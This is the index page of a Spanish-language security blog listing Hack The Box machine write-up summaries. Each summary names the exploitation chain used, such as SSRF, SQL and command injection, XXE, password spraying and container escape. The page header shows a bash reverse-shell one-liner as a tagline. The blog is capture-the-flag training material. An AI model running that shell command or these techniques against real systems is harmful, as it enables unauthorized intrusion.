sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
Hack The Box - Forge
· 鉁嶏笍 sckull
ssrf ftp sudo privesc pdb python
En Forge encontramos una vulnerabilidad SSRF que nos permiti贸 acceder por el servicio FTP donde encontramos una clave privada que nos dio acceso por SSH. Finalmente escalamos privilegios tras la ejecuci贸n de un script de python que utiliza PDB, haciendo que este gen茅re un error para obtener una shell como root.
Hack The Box - Forge
Hack The Box - Previse
· 鉁嶏笍 sckull
command injection john path
Previse presenta un sitio web donde encontramos un backup lo que nos llev贸 a 'Command Injection'. Obtuvimos acceso a un segundo usuario crackeando el hash de la base de datos del sitio. Finalmente escalamos privilegios modificando la variable PATH..
Hack The Box - Previse
Hack The Box - Writer
· 鉁嶏笍 sckull
sqli postfish sqlmap apt flask django smb
En Writer encontramos una vulnerabilidad 'SQL Injection' que nos permiti贸 obtener el codigo fuente del sitio, para luego realizar 'Command Injection' y acceder a la maquina. Credenciales para la base de datos nos dieron acceso a un siguiente usuario. Por medio de Postfish obtuvimos acceso a un segundo usuario. Finalmente escalamos privilegios utilizando un archivo de configuracion para APT.
Hack The Box - Writer
Hack The Box - Intelligence
· 鉁嶏笍 sckull
dnsscan exiftool password-spraying smb crackmapexec adidns krbrelayx responder bloodhound gmsadumper impacket
En Intelligence realizamos una enumeracion de usuarios en los metadatos de PDFs para luego realizar 'Password Spraying' lo que nos dio acceso a un primer usuario. Encontramos un script en un recurso de samba lo que nos permiti贸 obtener el hash de un segundo usuario tras ejecutar Responder y krbrelayx. Bloodhound nos mostr贸 que uno de los usuarios tiene la caracteristica de leer constrase帽as de cuentas gMSA, este ultimo tambien tiene caracteristicas 'Delegation' sobre el DC, con esta informacion obtuvimos acceso como administrador con gMSADumper y impacket.
Hack The Box - Intelligence
Hack The Box - BountyHunter
· 鉁嶏笍 sckull
xxe python sudo privesc
En BountyHunter explotamos una vulnerabilidad XXE la cual permitio obtener credenciales para acceder a la maquina. Obtuvimos acceso root mediante el analisis y explotacion de un script en Python especificamente de la funcion 'eval()'.
Hack The Box - BountyHunter
Hack The Box - Seal
· 鉁嶏笍 sckull
ansible-playbook playbook symlink tomcat nginx gitbucket
Seal presenta distintos respositorios en GitBucket, donde se muestra la configuracion de Nginx y Tomcat, por medio de estos logramos acceder al primer usuario. Un proceso nos permiti贸 generar un backup de la clave privada con un enlace simbolico de SSH de un segundo usuario. Finalmente escalamos privilegios utilizando ansible-playbook.
Hack The Box - Seal
Hack The Box - Explore
· 鉁嶏笍 sckull
android adb es file explorer api ssh
Explorer, la primera maquina android en HTB. Encontramos un puerto relacionado a ES File Explorer que expone una API que permite listar y descargar archivos del dispositivo, por donde descubrimos credenciales de acceso en una imagen. Para escalar privilegios utilizamos SSH para conectarnos con ADB a una shell privilegiada.
Hack The Box - Explore
Hack The Box - Monitors
· 鉁嶏笍 sckull
wordpress wpscan cacti sqli docker proxychains apache ofbiz java deserialization docker breakout
Monitors corre WordPress donde descubrimos un plugin vulnerable que nos llev贸 a Cacti con una version vulnerable donde obtuvimos acceso por una vulnerabilidad SQLi a RCE. Un servicio nos permitio obtener la contrase帽a de un segundo usuario. Encontramos Apache Ofbiz con una version vulnerable que nos permitio escalar privilegios. Con capabilities del contenedor escapamos de este tras instalar un 'kernel module'.
Hack The Box - Monitors